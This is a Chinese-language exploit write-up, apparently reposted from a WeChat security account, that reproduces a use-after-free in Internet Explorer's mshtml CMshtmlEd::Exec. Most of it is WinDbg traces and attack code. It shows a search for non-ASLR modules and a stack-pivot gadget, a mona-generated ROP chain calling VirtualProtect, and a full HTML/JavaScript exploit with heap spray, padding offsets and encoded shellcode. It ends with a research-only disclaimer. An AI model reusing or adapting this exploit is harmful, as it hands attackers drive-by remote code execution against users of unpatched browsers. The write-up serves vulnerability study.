67c60391 0601df78 0834ef20043c5e3c 000000000834efac 043c5e70 67c5bd3a043c5e4c 0601df78 03f78fd8 000000000000000f043c5e5c 0834ef20 0601df78 03f78fd8 0811cfd8043c5e6c 05e6cfd8 043c5e78 67adc0e7 043c5e94043c5e7c 67a445c6 0834ef20 0000000f 0710ef30043c5e8c 000000000604b680 043c5eb0 679f344e
释放的地址0601df78
之后便到了崩溃处
0:005> g(56c.e4c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=0834ef30 edx=0000000d esi=00000000 edi=0601df78eip=67a4503e esp=043c9a24 ebp=043c9a30 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206mshtml!CMshtmlEd::Exec+0x131:67a4503e 8b7f08 mov edi,dword ptr [edi+8] ds:0023:0601df80=????????
申请释放的过程如下表
可以看到在第二次mshtml!CHTMLEditor::AddCommandTarget处申请0601df78
在第二次mshtml!CMshtmlEd::Release处释放
在崩溃中重新引用
关闭HPA之后研究一下占位(PS:用管理员权限打开CMD)
开启页堆:
-
gflags.exe /i xx.exe +hpa
-
gflags.exe /p /enable xx.exe
关闭页堆:
-
gflags.exe /p /disable xx.exe
显示当前开启页堆的程序:
-
gflags.exe /p
mshtml!CMshtmlEd::Exec函数的代码如下
mshtml!CMshtmlEd::Exec:699c4faf 8bff mov edi,edi699c4fb1 55 push ebp699c4fb2 8bec mov ebp,esp699c4fb4 53 push ebx699c4fb5 56 push esi699c4fb6 57 push edi699c4fb7 8b7d08 mov edi,dword ptr [ebp+8]699c4fba 8b4708 mov eax,dword ptr [edi+8]699c4fbd 8b08 mov ecx,dword ptr [eax]699c4fbf 50 push eax699c4fc0 be00010480 mov esi,80040100h699c4fc5 ff5104 call dword ptr [ecx+4]699c4fc8 837d1403 cmp dword ptr [ebp+14h],3699c4fcc 7470 je mshtml!CMshtmlEd::Exec+0x131 (699c503e)mshtml!CMshtmlEd::Exec+0x23:699c4fce 8b5d10 mov ebx,dword ptr [ebp+10h]699c4fd1 81fb0e090000 cmp ebx,90Eh699c4fd7 0f85108d0900 jne mshtml!CMshtmlEd::Exec+0x2e (69a5dced)mshtml!CMshtmlEd::Exec+0x40:699c4fdd ff751c push dword ptr [ebp+1Ch]699c4fe0 8b4708 mov eax,dword ptr [edi+8]699c4fe3 ff7518 push dword ptr [ebp+18h]699c4fe6 ff7514 push dword ptr [ebp+14h]699c4fe9 53 push ebx699c4fea ff750c push dword ptr [ebp+0Ch]699c4fed e8b4feffff call mshtml!CHTMLEditor::InternalExec (699c4ea6)699c4ff2 8bf0 mov esi,eax699c4ff4 85f6 test esi,esi699c4ff6 7c46 jl mshtml!CMshtmlEd::Exec+0x131 (699c503e)mshtml!CMshtmlEd::Exec+0x5f:699c4ff8 7444 je mshtml!CMshtmlEd::Exec+0x131 (699c503e)mshtml!CMshtmlEd::Exec+0x65:699c4ffa b81c090000 mov eax,91Ch699c4fff 3bd8 cmp ebx,eax699c5001 0f83fd8c0900 jae mshtml!CMshtmlEd::Exec+0x72 (69a5dd04)mshtml!CMshtmlEd::Exec+0xf5:699c5007 ff7518 push dword ptr [ebp+18h]699c500a 53 push ebx699c500b ff7514 push dword ptr [ebp+14h]699c500e e8cffeffff call mshtml!CMshtmlEd::IsDialogCommand (699c4ee2)699c5013 85c0 test eax,eax699c5015 8b4708 mov eax,dword ptr [edi+8]699c5018 8b4050 mov eax,dword ptr [eax+50h]699c501b 0f85708d0900 jne mshtml!CMshtmlEd::Exec+0x10b (69a5dd91)mshtml!CMshtmlEd::Exec+0x10d:699c5021 53 push ebx699c5022 e87ee8ffff call mshtml!CCommandTable::Get (699c38a5)699c5027 85c0 test eax,eax699c5029 7425 je mshtml!CMshtmlEd::Exec+0x12c (699c5050)mshtml!CMshtmlEd::Exec+0x117:699c502b 57 push edi699c502c ff751c push dword ptr [ebp+1Ch]699c502f 8bf0 mov esi,eax699c5031 ff7518 push dword ptr [ebp+18h]699c5034 ff7514 push dword ptr [ebp+14h]699c5037 e820000000 call mshtml!CCommand::Exec (699c505c)699c503c 8bf0 mov esi,eaxmshtml!CMshtmlEd::Exec+0x131:699c503e 8b7f08 mov edi,dword ptr [edi+8]699c5041 8b07 mov eax,dword ptr [edi]
在mshtml!CMshtmlEd::Exec下一个断点,单步调试,看一下edi的状态
0:000> bp mshtml!CMshtmlEd::Exec0:013> gBreakpoint 0 hiteax=003bf520 ebx=00000000 ecx=6993a4c8 edx=00000000 esi=00391608 edi=69978eaceip=699c4faf esp=032b9a3c ebp=032b9a68 iopl=0nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Exec:699c4faf 8bff mov edi,edi0:005> peax=003bf520 ebx=00000000 ecx=6993a4c8 edx=00000000 esi=00391608 edi=69978eaceip=699c4fb1 esp=032b9a3c ebp=032b9a68 iopl=0nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Exec+0x2:699c4fb1 55 push ebp......0:005>eax=003bf520 ebx=00000000 ecx=6993a4c8 edx=00000000 esi=00391608 edi=003bf520eip=699c4fba esp=032b9a2c ebp=032b9a38 iopl=0nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Exec+0xb:699c4fba 8b4708 mov eax,dword ptr [edi+8] ds:0023:003bf528=059d22f00:005> !heap -p-a ediaddress 003bf520 found in_HEAP @2d0000HEAP_ENTRY Size Prev Flags UserPtr UserSize - state003bf508 00150000 [00] 003bf520 00088 - (busy)mshtml!CMshtmlEd::`vftable'
edi为CMshtmlEd对象,大小为0x88,接着执行到bp mshtml!CMshtmlEd::Exec下面一条命令此时edi对象已经被释放了
0:005> g 0x`699c5037eax=002c7088 ebx=0000001f ecx=002c7088 edx=0000001f esi=002c7088 edi=00304228eip=699c5037 esp=0247971c ebp=02479738 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Exec+0x123:699c5037 e820000000 call mshtml!CCommand::Exec(699c505c)0:005> !heap -p -a ediaddress 00304228 found in_HEAP @ 210000HEAP_ENTRY Size Prev Flags UserPtr UserSize - state0030422000120000 [00] 0030422800088 - (busy)mshtml!CMshtmlEd::`vftable'0:005> peax=00000000 ebx=0000001f ecx=002f3270 edx=0000000d esi=002c7088 edi=00304228eip=699c503c esp=0247972c ebp=02479738 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Exec+0x128:699c503c 8bf0 mov esi,eax0:005> !heap -p -a ediaddress 00304228 found in_HEAP @ 210000HEAP_ENTRY Size Prev Flags UserPtr UserSize - state00304220 0012 0000 [00] 00304228 00088 - (free)
释放的空间大小为0x88(之前调试的时候一直是0x98,因为UST没有关闭)
>"YMjfu0c08u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH".length< 64>(64*2+2).toString(16)< "82"
我们EXP中字符串大小为64,由于是Unicode,加上两个结束符,最后大小为0x82,于是我们在这个字符后加上3个字符,让他完美占位
0:005>eax=0033a2f8 ebx=00000000 ecx=6937a4c8 edx=00000000 esi=00311be0 edi=0033a2f8eip=69404fba esp=025e98c4 ebp=025e98d0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0xb:69404fba 8b4708 mov eax,dword ptr [edi+8] ds:0023:0033a300=00357e080:005> !heap -p -a ediaddress 0033a2f8 found in_HEAP @ 270000HEAP_ENTRY Size Prev Flags UserPtr UserSize - state0033a2f0 00120000 [00] 0033a2f8 00088 - (busy)mshtml!CMshtmlEd::`vftable'0:005> dc edi0033a2f8 6937a4c8 00000002 00357e08 003231a0 ..7i.....~5..12.0033a308 003418f8 00000000 00000000 00000000 ..4.............0033a318 00000000 00000000 00000000 00000000 ................0033a328 00000000 00000000 00000000 00000000 ................0033a338 00000000 00000000 00000000 00000000 ................0033a348 00000000 00000000 00000000 00000000 ................0033a358 00000000 00000000 00000000 00000000 ................0033a368 00000000 0033a2f8 00000000 00000000 ......3.........
绕过ASLR
!mona modules
这里选择一个没有ASLR的模块MSVCR71.dll,到时候调用他的命令
PS:新安装的系统根本没有部分模块=-=为了测试这个漏洞安装了jdk1.6
0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------0BADF00D Module info :0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------0BADF00D 0x69490000 | 0x69f10000 | 0x00a80000 | True | True | True | True | True | 8.00.7600.16385 [IEFRAME.dll] (C:Windowssystem32IEFRAME.dll)0BADF00D 0x7c340000 | 0x7c396000 | 0x00056000 | False | False | False | False | False | 7.10.3052.4 [MSVCR71.dll] (C:Program FilesJavajre6binMSVCR71.dll)0BADF00D 0x740e0000 | 0x74119000 | 0x00039000 | True | True | True | True | True | 6.1.7600.16385 [MMDevAPI.DLL] (C:Windowssystem32MMDevAPI.DLL)0BADF00D 0x6d440000 | 0x6d44d000 | 0x0000d000 | False | False | False | False | False | 6.0.450.6 [jp2ssv.dll] (C:Program FilesJavajre6binjp2ssv.dll)0BADF00D 0x76f90000 | 0x770c6000 | 0x00136000 | True | True | True | True | True | 8.00.7600.16385 [urlmon.dll] (C:Windowssystem32urlmon.dll)0BADF00D 0x73980000 | 0x7399c000 | 0x0001c000 | True | True | True | True | True | 6.1.7600.16385 [iphlpapi.DLL] (C:Windowssystem32iphlpapi.DLL)0BADF00D 0x68ed0000 | 0x69487000 | 0x005b7000 | True | True | True | True | True | 8.00.7600.16385 [mshtml.dll] (C:WindowsSystem32mshtml.dll)0BADF00D 0x6ec00000 | 0x6ec30000 | 0x00030000 | True | True | True | True | True | 6.1.7600.16385 [wdmaud.drv] (C:Windowssystem32wdmaud.drv)0BADF00D 0x75630000 | 0x7567c000 | 0x0004c000 | True | True | True | True | True | 6.1.7600.16385 [apphelp.dll] (C:Windowssystem32apphelp.dll)0BADF00D 0x6fbe0000 | 0x6fc67000 | 0x00087000 | True | True | True | True | True | 8.00.50727.4940 [MSVCP80.dll] (C:WindowsWinSxSx86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fcMSVCP80.dll)0BADF00D 0x757a0000 | 0x757ac000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:Windowssystem32MSASN1.dll)0BADF00D 0x6d740000 | 0x6d797000 | 0x00057000 | False | False | False | False | False | 6.0.450.6 [ssv.dll] (C:Program FilesJavajre6binssv.dll)
Heap Spray
不知道为什么这里只能到崩溃处,无法执行到崩溃后的语句,会进入ntdll!KiUserExceptionDispatcher
0:005> g(30c.484): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=05d41388 edx=0000000d esi=00000000 edi=0c0c0c08eip=69715041 esp=03359664 ebp=03359670 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206mshtml!CMshtmlEd::Exec+0x134:69715041 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????
后测数据
0:005> !heap -p -a 0c0c0c0c address 0c0c0c0c found in _HEAP @ 420000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 0c020018 1fffc 0000 [00] 0c020030 fffd0 - (busy VirtualAlloc)offset=(0c0c0c0c-0c020030)%0x1000/2=5EE
我们在0c0c0c08处写入0c0c0c0c,这样后面call dword ptr [eax+8]就会call 0c0c0c14了,我们打算在0c0c14处放入我们的stack pivot —–> xchg eax,esp ; retn(至于为什么需要这个,后面解释)
而stack pivot的机器码是 94 c3,在mona上查找一下这个地址在哪
!mona find -s "x94xc3" -m MSVCR71
0x7c3837d5 : "x94xc3" | {PAGE_READONLY} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:Program FilesJavajre6binMSVCR71.dll)0x7c348b05 : "x94xc3" | {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:Program FilesJavajre6binMSVCR71.dll)
我们使用第二个地址0x7c348b05 ,因为第一个没有执行权限
大概结构为offset+padding+stack pivot+rop+padding
开始构建我们的Exp代码
//rop chain generated with mona.py - www.corelan.berop_gadgets = unescape("" + // #[---INFO:gadgets_to_set_ebp:---] :"%u6d2c%u7c35" + // 0x7c356d2c : ,# POP EBP # RETN [MSVCR71.dll]"%u6d2c%u7c35" + // 0x7c356d2c : ,# skip 4 bytes [MSVCR71.dll]"" + // #[---INFO:gadgets_to_set_ebx:---] :"%u28bf%u7c34" + // 0x7c3428bf : ,# POP EBX # RETN [MSVCR71.dll]"%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx"" + // #[---INFO:gadgets_to_set_edx:---] :"%u44d0%u7c34" + // 0x7c3444d0 : ,# POP EDX # RETN [MSVCR71.dll]"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx"" + // #[---INFO:gadgets_to_set_ecx:---] :"%u8ab2%u7c35" + // 0x7c358ab2 : ,# POP ECX # RETN [MSVCR71.dll]"%ude03%u7c38" + // 0x7c38de03 : ,# &Writable location [MSVCR71.dll]"" + // #[---INFO:gadgets_to_set_edi:---] :"%u02a6%u7c37" + // 0x7c3702a6 : ,# POP EDI # RETN [MSVCR71.dll]"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]"" + // #[---INFO:gadgets_to_set_esi:---] :"%uad9f%u7c34" + // 0x7c34ad9f : ,# POP ESI # RETN [MSVCR71.dll]"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]"%u62fb%u7c37" + // 0x7c3762fb : ,# POP EAX # RETN [MSVCR71.dll]"%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]"" + // #[---INFO:pushad:---] :"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]"" + // #[---INFO:extras:---] :"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]""); // :
最终的EXP代码为
<html><body><script>var arrr = new Array();arrr[0] = window.document.createElement("img");arrr[0]["src"] = "f";function alloc(bytes, mystr) {while (mystr.length<bytes) mystr += mystr;// 6 = 4 + 2return mystr.substr(0, (bytes-6)/2);}block_size = 0x1000;//padding_size = 0x5EE; //offset to 0x0c0c0c0c inside our0x1000hex blockpadding_size = 0x5EA; //offset to 0x0c0c0c08 inside our0x1000hex blockcall0c = unescape('%u0c0c%u0c0c');Padding = '';NopSlide = '';NopSlide1 = '';NopSlide2 = ''//paddingfor (p = 0; p < padding_size; p++){Padding += unescape('%u4141');}for (c = 0; c < block_size; c++){NopSlide += unescape('%u9090');}var Shellcode=unescape("%uecd9%u74d9%uf424%uc3bf%u291e%u5dcf%uc929%u42b1%u7d31%u0319%u197d%uc583%u2104%uf0eb%u3e24%u77cd%ub49f%ua5df%u436d%u8311%u20f6%u2320%u407c%uc8cf%ub0f4%u8844%u43f0%u3524%u658a%u7ae1%ufc94%udce2%u2fa5%u3efb%u44c5%ue568%ud122%ud934%ub1a1%u599e%ud3b7%ud354%ua8af%uc431%u45ce%u3026%u1298%ub29d%uca1b%u3bef%ud22a%u68ec%u12c9%u7678%u5d13%u798c%u8a54%u427b%u6826%uc0ac%ufb37%u0ef6%u10b9%uc460%uadb5%u80e6%u30d9%ubf12%ub9e6%u28e5%uf96f%ub4c1%uc211%ucdb8%u10f8%u2835%u5a73%u3d2e%u54ca%u1343%uf73b%u6b64%u8e44%u90de%uee00%u7a38%u8905%u5fa5%u7db8%u605b%u82c3%udaed%u1434%u8882%ua564%u6232%u0b57%ueca7%u20e2%u9f42%u1d3c%u0304%uab19%u5a9c%u5437%ua6cb%u6831%u1da4%ucee9%ude08%u126d%u4cb7%u759a%u8f48%ue1a5%u50ee%ud17a%uf466%u6818%u9e12%ue3aa%u3db2%u2862%u9ec2%uc6a0%ufd5a%u8ec1%u227c%u4632%u4018%uf34b%uf28a%u95c2%uca29%ue1dd%u08e2%u78d6%u611b%u2834%ud38f%u33ea%ue5ff%u9bca%u53ff%u41c3");//rop chain generated with mona.py - www.corelan.berop_gadgets = unescape("" + //#[---INFO:gadgets_to_set_ebp:---] :"%u6d2c%u7c35" + // 0x7c356d2c : ,# POP EBP # RETN [MSVCR71.dll]"%u6d2c%u7c35" + // 0x7c356d2c : ,# skip 4 bytes [MSVCR71.dll]"" + // #[---INFO:gadgets_to_set_ebx:---] :"%u28bf%u7c34" + // 0x7c3428bf : ,# POP EBX # RETN [MSVCR71.dll]"%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx"" + // #[---INFO:gadgets_to_set_edx:---] :"%u44d0%u7c34" + // 0x7c3444d0 : ,# POP EDX # RETN [MSVCR71.dll]"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx"" + // #[---INFO:gadgets_to_set_ecx:---] :"%u8ab2%u7c35" + // 0x7c358ab2 : ,# POP ECX # RETN [MSVCR71.dll]"%ude03%u7c38" + // 0x7c38de03 : ,# &Writable location [MSVCR71.dll]"" + // #[---INFO:gadgets_to_set_edi:---] :"%u02a6%u7c37" + // 0x7c3702a6 : ,# POP EDI # RETN [MSVCR71.dll]"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]"" + // #[---INFO:gadgets_to_set_esi:---] :"%uad9f%u7c34" + // 0x7c34ad9f : ,# POP ESI # RETN [MSVCR71.dll]"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]"%u62fb%u7c37" + // 0x7c3762fb : ,# POP EAX # RETN [MSVCR71.dll]"%ua151%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]"" + // #[---INFO:pushad:---] :"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]"" + // #[---INFO:extras:---] :"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]""); // :stack_pivot = "u8b05u7c34"; // 0x7c348b05ret = "u7f98u7c34"pop_ret = "u7f97u7c34" //pop eax ,retrop_gadgets = rop_gadgets + NopSlide.substring(0, 32);var OBJECT = Padding + call0c + ret + pop_ret + stack_pivot + rop_gadgets + Shellcode + NopSlide.substring(0, block_size - Padding.length - Shellcode.length - rop_gadgets.length - 4*4/2 );;//alert(OBJECT.length);OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb(0x10000-32)//bp mshtml!CFormElement::DoReset+0xe4//allocvar evil = new Array();for (var k = 0; k < 150; k++) {evil[k] = OBJECT.substr(0, OBJECT.length);}</script><iframe src="./payload.html"></iframe></body></html>
注意点:
-
offset=0x5EA是到0c0c0c08,在0c0c0c08处赋值0c0c0c0c,后面call [eax+8],就会调用stack_pivot
-
Rop链处的VirtualProtect地址要+11变为0x7c37a151,因为后面多加了一个add al,0ef,要去掉这个的影响
这个漏洞主要是payload.html中的字符串将edi赋值为0c0c0c08,后面会将这个值赋给eax。而我们后面的调用call [eax+8],很明显也是要call [0c0c0c14],此处看我们在0c0c0c14处的值
首先明确几点
padding_offset为0x5EA为到0c0c0c08的值,后面我们EXP.html后面跟的0c0c0c0c,就是为了将edi赋值给eax值,是令eax为0c0c0c0c,方便后面的栈翻转
原文始发于微信公众号(Sec探索者):【漏洞复现】浏览器漏洞利用实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论